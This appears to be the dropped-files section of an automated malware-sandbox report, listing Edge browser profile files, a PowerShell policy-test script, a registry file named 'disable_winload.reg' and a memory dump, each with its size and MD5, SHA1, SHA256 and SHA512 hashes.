851d7318b56dc3ae5975076199248b3972431876eebd9280f003eafe1fd47bd0beb4a8e8376f4559bb1420d5650440e2ae40392451bad0803d2cfe27d43e4921

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe596da4.TMP
Filesize
96B

MD5
17775f34f6047e340213132f6f776f7e

SHA1
665b9276bbe804256e3d000fa15e57e6a4ce2818

SHA256
a8e4b42967c629d0ef889866418fc2438f068c2c29b072fc556d65fd59486095

SHA512
aef94236e8aad9cd34b07d296192ce563caffeeaa0d68c5377df2b0f15d858bb3d028256716f5ed1e9e8d060f68ad4b96f3524fb51f70144e5c97271d3f1fb21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG
Filesize
322B

MD5
64e0e9712d064b843dd5dd64c32bf9a9

SHA1
7f98b2d45556dc5bf098c786ca356d8ed5625a8a

SHA256
602e718582115beafb4f94aad2c45d8525d845dddd86c1559ccc3f0b1ee2a415

SHA512
a9e058d97bd53d818f980d56a81a701da4cbb5d798436e83404d2e2623c98a6199ca43989ca36ef578653aa883f372f51302982ffccd5767c9d5c112a88b3313

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History
Filesize
124KB

MD5
9426d59ab9f4657a8ae16cca219e2432

SHA1
22c6cd0cc631bb8a13fb55f05283c07f7bdd0c20

SHA256
89787a5e101c652930563fa23f13da2a9485014f75437db622d5bd480504d7d6

SHA512
1a7604f3535ff667e502148e7120d756f6cecbbd663bf819287f751892ebe6e3d174f0aaed305c99bb793b856baf3ae07dbd0f33ae09d955e5b57c7fe9df36df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Filesize
28KB

MD5
395ba6f68e4e5a82a24be0f0516c3316

SHA1
e2a8558f706bfe5230f658261a2278e60b9b11e3

SHA256
e8894266982e7d8091897c7a7bc14384e732a8c392b43c554a24d218b3b49493

SHA512
db7c12a65dbd81852456355d04b08edce7d7654a9bea896bebec98ef17376567fd24997a145eb7f21e6126686eb4f83ad4d53993f87d5aa0a544bfb08a3ee1d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG
Filesize
331B

MD5
07ab06a493c7fe9c0819d5549ed7a6d7

SHA1
79e0cdca117b7c2ba84e2e931f6e0540163a07e9

SHA256
8347da4e6749be9a94c9a69695f6687dd5d7fe759d1f89263cb6cde8a22cee45

SHA512
61851d97ca4d31f0662c6df7d687c2a71947bc1d2a36462936a647c69bb72f41da70f0014c510721e0b6a00595ed10919ed95c1f6d3718731db5d01c696b80e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Action Predictor
Filesize
36KB

MD5
cf4b0a74bdc68a111bd7ccbd8569daa5

SHA1
e567e83b8db5476018dfed63802d0f60690c8139

SHA256
f79fc9fca22eace1d33311f380f135b75b30baa639f2d819fa437580ef268b6d

SHA512
4ffda967282821d319e22334cc4410eb8883b436654c2ffa65a7a75fdac296a349a672c734e8fed023b9b34d5f17d1af611f81d433108f898459b5ae412dac9f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
c6cc333df6b0d3cea41d36e2e39cfc90

SHA1
c126b78ba094987560cf19062ab0a6a7f5eafefb

SHA256
2be7b557189f01b0d521eec83f18d259883b447a9605633439072aa37eb8f8c8

SHA512
9cce3f40b035baa529784e5afcba802a4902910de9b6342922c9298c067846e277cab2a34256e2fba35ab25543891ae43feff64587b83a422a8725d46bcad127

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
38a4dfa40a31160e5af62b5e1854214c

SHA1
184a2cc46351eba0057262ade360b08d5ef69161

SHA256
8ef34890c9bf32b02c7b7827239e4cba3957cce8bbfd5c40b177a8eeb9976eb2

SHA512
7a2fd853fbe10c0524a7aa005e19c66eca0c5e5645c7a457eee74356b5b83caea581c23d16a1a721ab4137a8f4fb4263644ade4ccac0c8179799b13a210787d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
7d24319629a141a490f82c08a2a31272

SHA1
3ff1727c391ee38c4ca128dca6f76ad72ec37f21

SHA256
6eba2178231dba9d7559d98c22cd41915e7134b4b6c1841bf9486c169bf4e91b

SHA512
7e215a264d69ea85a099b6f0d966a8997c452f2ed99a11eaa9724bdcf026e6687f7e02683b116fc6ea8112d6076bf31889f59611c80a5f8fceb1c49f23c1ff32

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
af07ef9ad8a24a5506017922725df9ba

SHA1
0dd98ce60e8c61a04b836d4b1428f081d0dc56d8

SHA256
11551cd4295d9e908e6609f6adf03ccd0e95f849506ace45449bce7c4cd197f4

SHA512
07ed4f736f0676ca15aed5aab549e666987a338efb64b3763d0ca5b3a4f1480dfe1512c82d271c0ea1e4064b669df8f008b5b1f0c2235a79f1df7cb8140ac0e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferredApps
Filesize
33B

MD5
2b432fef211c69c745aca86de4f8e4ab

SHA1
4b92da8d4c0188cf2409500adcd2200444a82fcc

SHA256
42b55d126d1e640b1ed7a6bdcb9a46c81df461fa7e131f4f8c7108c2c61c14de

SHA512
948502de4dc89a7e9d2e1660451fcd0f44fd3816072924a44f145d821d0363233cc92a377dba3a0a9f849e3c17b1893070025c369c8120083a622d025fe1eacf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13360620960277119
Filesize
4KB

MD5
2cb4678f2c5032cae2d6d3dce09c397e

SHA1
08543758b1f9bc54d90642899878b38e95bb5e0f

SHA256
4bf09bd4a0917dbd75e2a492b7d818b0fa12e58013cd869009d8e9ab3de1b16c

SHA512
e656d8d42720be26a3f790889f33d94c90c4a4feadb7640d5a03f2e170ea0055e0cd49b18009cc8d1b442be25d5d32e29f91b8b23c93309b45e238ae20312600

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13360620960560119
Filesize
933B

MD5
399f4f47349551c65529f04981abd6c0

SHA1
b7db43f5ab8135d5f88ea440b4f646275716b9f2

SHA256
7293d04f90f15373da9a5c8713c88c927c98232b90ee692e2ad3f18e8fbaf993

SHA512
406ac644862c2f33cb61149ad12bcf47240f4d729920c4dc44899d57d2d3ce2941d46ff1c955a2ac1788ea430d7f2ed1ca5ef0e584a2ea2d123edbc4a84e513e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts
Filesize
20KB

MD5
fca621466ede4c2499ecb9f3728e63ab

SHA1
3d5d4cd0fa702371f9d1a40e72e1fe19d194a3c4

SHA256
c6dde84fb40fb69d1a6637fe6bf781de51a4c24e45b616e8f97afd3c6fe200b8

SHA512
aa12ed8c1ff85af4375ac80d7fe494d6f8a70ddb3357c186a0c1ade9bbcc3efc3de5fb0ad4b81eb2ab9bc916b6adf8b76c30203f78e38cd00af5fa4ccf3e3760

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG
Filesize
350B

MD5
ef957349084b1173d0f33b468efc601d

SHA1
1e069fd2d51ac5ce15ed6bb97a5b7bb1d5540b09

SHA256
a65bb55d4dfec9f4a2dd0a69311d665ad93931edf2fb4c7ec5ef3d9868e30edb

SHA512
bcec4780ca242d69bc26f8fed2b090267b94172ab5452edf3670411b8744a304b946fd0c27fa478497bc736a2ef2b1feb54d2553c7bd4a29832c3fb116bd02e4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG
Filesize
323B

MD5
63f20def912eb16310eb9d8ac6cc291a

SHA1
706aacceca8e02d575f0c9d83280cf1caa68ae86

SHA256
b7af2545f0427b0839da8ff0ae3ba98a7ff564635d9d207ebe295ae922819991

SHA512
1cc3e69cfdaa3c29aeec77dc34059b3b71bbb3a96345787dc6c16a8da5fffb1ad923686b707bab425fa79e03b624cdc4851a9f1a1e0f2829d4a03965f4399346

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links
Filesize
128KB

MD5
aced0e90b7e2b2f643e4d7710ced39d7

SHA1
ede1baa9d1f4730a12108c26092e104c11b880b7

SHA256
62173dfe01638bcb5fde58dbce6a4f04920435c9f67a80220e5915daa622ce51

SHA512
65dc2199f789207a116a9c6613611a4ec9bd0aa74a76d8272ae4e71781f6d6b2e1ec39aaa2dacc21e76e1b3228cc19305ae49d071a2189d948ed6ff6a9e030d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\LOG
Filesize
198B

MD5
f70f01a098339f4ac0622a52ed61812a

SHA1
c4782d14eea2a3b359fe8a72e1d20a1a863eab69

SHA256
d649000d5785eb36d69ee316a5c7f59fe8d46fada951aa69ce5bee95cccb47c1

SHA512
a1c7e6cc65be38ffe527a17692def01fb9019ff5b770e619a4e054cbc4304753bdc37ece26b543b52f8355050f169abd5be13bc3ed8bfd936982df701b0baec9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000002
Filesize
50B

MD5
22bf0e81636b1b45051b138f48b3d148

SHA1
56755d203579ab356e5620ce7e85519ad69d614a

SHA256
e292f241daafc3df90f3e2d339c61c6e2787a0d0739aac764e1ea9bb8544ee97

SHA512
a4cf1f5c74e0df85dda8750be9070e24e19b8be15c6f22f0c234ef8423ef9ca3db22ba9ef777d64c33e8fd49fada6fcca26c1a14ba18e8472370533a1c65d8d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db
Filesize
16KB

MD5
9e02552124890dc7e040ce55841d75a4

SHA1
f4179e9e3c00378fa4ad61c94527602c70aa0ad9

SHA256
7b6e4ce73ddd8b5e7a7c4a94374ac2815d0048a5296879d7659a92ee0b425c77

SHA512
3e10237b1bff73f3bb031f108b8de18f1b3c3396d63dfee8eb2401ce650392b9417143a9ef5234831d8386fc12e232b583dd45eada3f2828b3a0a818123dd5cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal
Filesize
177KB

MD5
d618b67097f828d2010fb5d0e74c987b

SHA1
92d6a39b730af8840981376bf76d5d3e548d26be

SHA256
c937b2128e77baa1c4b4a49dd34b55bfafe53327a7c7b738a3ddec9cc6c85eea

SHA512
bec24f5fdeef2bab04b0b327c93466706004b61cb71c41d8924aac230c24210be915a9cc366bd99a8a169e8648dcd5f026d8fa567a8815c1bd96b362fbddffe1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log
Filesize
187B

MD5
4a890675ec63575da12a3d09af0f43d3

SHA1
bc585ed72198351d66a9f220c6d3a69be5621aac

SHA256
5bb3df7918d2009ad79929503414ae654579fd0b1d74d08a5fb075c99f40cca4

SHA512
e9c20c911b1754ee30cb49e1a8aed4778aa71903a88f41d328491ffab194a629d0217ef8db13b5083c36a604d3f92bf5838b1e06b635f87ed0921eddefc97ac4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG
Filesize
319B

MD5
49a1201fb21226aa0b7532c55ff4fd40

SHA1
e5dc6fe907a74a179c09601032fcff399b7da34c

SHA256
504244d42c624f630adc0195634019943e67bd3b0bfa0dc2010084020fe61744

SHA512
261d8cacf42e4a869d6587ef8cdc9c454ea089dc01f80534c12f1cfba007727b1eae90666a6a340ba3db98561340113e234e199b452636d34c272fd12d8c0c9d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log
Filesize
594B

MD5
c7d82d3c20338e91384c159a989d5f5d

SHA1
5f82f9fcee48e891e631e08d6d87f6fe865112e0

SHA256
cb2ccf6b13d83d16ff65945d363ae269221da8db017ca6b36c446a1850ffa8dc

SHA512
6c93b4afdb047d68ef49a363b6f191fe5eee4bde198c92e07d044b599a4371162decf2f5ad12109dedcd0a17a84a1ecc32108cd5419894a8f26b2cb818f6143e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG
Filesize
337B

MD5
6afccce754297e5dd3754727e80b6f77

SHA1
f8768cc0093d26f2b3f8c8fd6759ddb5a97c8146

SHA256
1b6ba353c9a64f570ebc1e05d92d77cda177fee5cfb75261294c6068e7c5cd68

SHA512
caf68f23973f83328fa8a25f8088549efad0e11eec5fd832e80fb8efe626316266eaf9f4764d789dfca18f72a97f4f579283d820a3c32512dd956bdea5c1884f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0
Filesize
44KB

MD5
163c653b1952e9b1bf710cfa65b5f1dc

SHA1
1d11c24fafda3672f6a344a035030d05b67592f1

SHA256
78250de0ec0be72a0642661609cf2be39e67692cfdc489ff8eddb637d21961ce

SHA512
b7f0f0d1976a721fef2de80602692c85cdfa2c90c2578e55bbeaab8bc9f1597ab190e22817db913d97760b6409b8458bcb0c4460de53df8b651825f98fa369f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1
Filesize
264KB

MD5
4e5be79cdb248e2b5e9332d9fe38150c

SHA1
62bf86f0dd94a1ec05ade46a724655e071c40a49

SHA256
a237bf0d3828972604b93b6398ed01c8ab7a33e51887158d5061eae334899d22

SHA512
b76b4b669d69a8088a2a7d88f47356360d2126c106f97670429ba4665385c6d143aa7593f8292303c45d93330b0a0de86d34cb58e780810dc9bddcb6282bf658

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3
Filesize
4.0MB

MD5
019e334057588087a1d13e80727ba10c

SHA1
8b6ba62e627c2a51dfc7c4d45c4087a0182987c8

SHA256
9f776bd8e4cc46effb0505b3ea9effc65640da9ce25e59c99e91deebb60191e1

SHA512
6b2a68cd247360071b2e49b8ab0f4eb996c0eeaf07d4cf2cfb3297474bfed267f944847ebc5c45643658154b7029ad041ae1a5619c2aae4f0ca09e4a2f0ea802

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Browser
Filesize
120B

MD5
a397e5983d4a1619e36143b4d804b870

SHA1
aa135a8cc2469cfd1ef2d7955f027d95be5dfbd4

SHA256
9c70f766d3b84fc2bb298efa37cc9191f28bec336329cc11468cfadbc3b137f4

SHA512
4159ea654152d2810c95648694dd71957c84ea825fcca87b36f7e3282a72b30ef741805c610c5fa847ca186e34bde9c289aaa7b6931c5b257f1d11255cd2a816

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
Filesize
11B

MD5
838a7b32aefb618130392bc7d006aa2e

SHA1
5159e0f18c9e68f0e75e2239875aa994847b8290

SHA256
ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa

SHA512
9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
e45df01867921c09147ebc838115ded7

SHA1
90837a17acb4e9743ebf6a51a82613bc4d4355c5

SHA256
0835b8a3af2c6c7ab59c6ec20bce4124878623516d5a8de35c5045f1fb806d5f

SHA512
a6849314e2c4366f88a9fa31c0c0f7dae002c531ea4d3b1ef775d7b3c7b707d976d48269833582accf3bb3fc662d609b0563fff6f215ce626e1069455d540cd0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
f550c380dd1cbf3b0146563aeffaebbc

SHA1
e2d442e87bc6692169d08b0a69a1b4503bb41440

SHA256
9026f1f45c4bcf18e75f5dbb498f9a1546530d03ea5cbdb7bef84ad580aa9de4

SHA512
9fc806088796fef3d3c9fd7f698dcca2155714e81526ff727c035a9a798fbe612d3553090a74df14c5d181a75e98c95b79da96034765e04a072d7bac43384a28

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres
Filesize
4KB

MD5
1eaa1674380df2e85f948ab3645b6a2d

SHA1
cca11a2d973150990fd8bafea1cecbfee1fd5704

SHA256
e6a07e925e9e14279a6ea3124c2018e090beca3ebfbc78e714c605786e3e9388

SHA512
beb83f8f9e8371581eee4f4b18a4386532c4777acf5e7c4aae92226401f49a68876179121f0fd9993878cc003da814ac6e86f5a64d3f156256492ccb7a907ee3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
e3b90537044a639dc6154f7eba9c8404

SHA1
dec8d4d8f0a9a8866babb6f17dd68d8a54e7f47a

SHA256
e0df7204949b2bf43825bfed4b611728bcf2683aabb280d4b4342a75cab34662

SHA512
3ad09f527b0475c847881c916e4f3854e3846e86b699f9194318ccda9b75af18cb7b02e6127f98ea17872cc6fe6f6731e73cbd39177bf56a3561450aebf463d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
235a8eb126d835efb2e253459ab8b089

SHA1
293fbf68e6726a5a230c3a42624c01899e35a89f

SHA256
5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686

SHA512
a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dlw4m3ai.1ny.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\disable_winload.reg
Filesize
91B

MD5
47b5ae368c4aff20eafa90ffdcd03a34

SHA1
dff7d41c3d4a68e9e633b671b4a4c7fcb40c8f81

SHA256
aaf7fcebf2aa8e1ebd7bff75c05ab14951a6c7f7a37e9db0a15403cb491b3e07

SHA512
c4b8ad90b868aefea7b95701b1d4a5d6239d0fe452fad25df4fe6c8928c529d99225930d3fe2941b10bd6b07eef05aff9fd443a836638fc4916372d2588c136f

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db
Filesize
1024KB

MD5
b0bcb925d85cd65cc926570d3dfed96e

SHA1
23c123a744528fbd7325a597ebbc7c75e6ea853d

SHA256
cb215908a1c883d3cfb7ed6157d42af6da3a8fcf5993f3f3d582c5f7ec683d23

SHA512
a0037f1ef86a4c2eeef6b19de16d6d71eff35aaff9daedfbc7f8227305d8acc8d36e119c590ef1ca6d3a25e2bbb0b6e91202ec93c1b22e7b961e00e839d8ba94

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
Filesize
7KB

MD5
a1dfdeb0848c46179d0d882ffe23d376

SHA1
8d52d9199d3bd2b12ba714fcf978eb7e44e46d07

SHA256
aeeeb2061f29f4e7633b58063d231debddb3110fde08ecf97bc25b76dcf491b0

SHA512
aba22cbaeb799cfea34c3a0a9c4a5d6822e40622f52df061097b5e77cc5cb329f75b8c7ae654b8f0944f4fbf2ba2d63f6352693fafb9cd11bb1df3fb249a62aa

Download Submit
\??\pipe\LOCAL\crashpad_4844_NVNBMRQCICKMXHHC
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/2692-5-0x0000016E53E70000-0x0000016E53E92000-memory.dmp

Filesize
136KB

Download